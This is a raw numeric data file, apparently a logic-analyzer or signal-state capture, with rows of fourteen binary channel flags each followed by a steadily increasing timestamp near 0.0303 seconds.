0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341468e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341516e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341544e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0341920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0341944e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0341972e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0341996e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342020e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0342044e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342068e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0342092e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342116e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0342144e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342172e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0342196e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342220e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0342244e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0342268e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342344e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342468e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342520e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342544e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342716e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342944e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0342972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0342996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343068e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343268e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343344e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343372e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343396e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343420e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343444e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343468e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343492e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343520e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343544e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343572e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343596e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343620e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0343644e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0343668e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343944e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0343972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0343996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344068e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344268e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344344e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344420e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344424e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344444e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344468e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344492e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344520e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344544e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344572e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344596e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344620e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344644e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344668e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.0344692e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.0344720e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344868e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344944e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0344972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0344996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345068e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345268e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345344e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345468e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345520e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345544e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345820e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345844e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345892e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0345916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0345940e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0470916e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471112e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,3.0471140e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471168e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.0471700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.0471724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0471752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0471804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0471852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0471900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471924e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0471952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0471976e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472124e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472148e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472172e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472200e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472224e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472324e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472348e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472372e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472400e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472424e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472524e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472548e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472572e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472600e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472624e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472724e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0472924e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0472972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473200e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473224e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473748e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473772e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473800e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473824e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473924e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0473948e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0473972e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474000e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474024e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474124e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474148e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474172e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474200e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474224e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0474948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0474972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0475948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0475972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0476948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0476972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.0477024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.0477052e-02 